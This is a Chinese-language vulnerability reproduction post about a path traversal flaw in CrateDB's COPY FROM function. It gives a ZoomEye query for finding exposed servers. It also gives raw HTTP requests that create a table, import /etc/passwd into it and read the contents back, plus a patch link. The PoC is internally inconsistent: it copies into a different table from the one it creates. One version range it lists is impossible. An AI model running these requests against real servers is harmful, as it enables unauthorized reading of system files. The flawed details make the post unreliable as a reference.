0x00写在前面

本次测试仅供学习使用,如若非法他用,与本平台和发布者无关,需自行负责!

0x01漏洞介绍

CrateDB是CrateDB公司的一个分布式且可扩展的 SQL 数据库。

CrateDB 5.3.9之前、5.4.8之前、5.5.4之前和 5.6.1之前版本存在路径遍历漏洞,该漏洞源于COPY FROM函数存在缺陷,攻击者利用该漏洞可以使用COPY FROM函数将任意文件内容导入到数据库表中,从而导致信息泄露。

0x02影响版本

5.4.0<=io.crate:crate<5.4.8,5.6.0<=io.crate:crate<5.6.0,io.crate:crate<5.3.9,5.5.0<=io.crate:crate<5.5.4

0x03漏洞复现

zoomeye语法

zoomeye语法  app:"CrateDB"

1.访问漏洞环境


2.对漏洞进行复现

 POC (POST)

漏洞复现

创建数据

POST /_sql?types HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Content-Length: 52
Access-Control-Allow-Origin: *
Connection: keep-alive
Content-Type: application/json; charset=UTF-8
Accept-Encoding: gzip
Connection: close

{"stmt":"CREATE TABLE hixwxdyt(info_leak STRING)"}

copy数据

POST /_sql?types HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Content-Length: 79
Access-Control-Allow-Origin: *
Connection: keep-alive
Content-Type: application/json; charset=UTF-8
Accept-Encoding: gzip
Connection: close

{"stmt":"COPY qginjohb FROM '/etc/passwd' with (format='csv', header=false)"}

读取etc/passwd(漏洞存在)

POST /_sql?types HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Content-Length: 44
Access-Control-Allow-Origin: *
Connection: keep-alive
Content-Type: application/json; charset=UTF-8
Accept-Encoding: gzip
Connection: close

{"stmt":"SELECT * FROM hixwxdyt limit 10"}

3.nuclei工具测试(漏洞存在)


0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://github.com/crate/crate/security/advisories/GHSA-475g-vj6c-xf96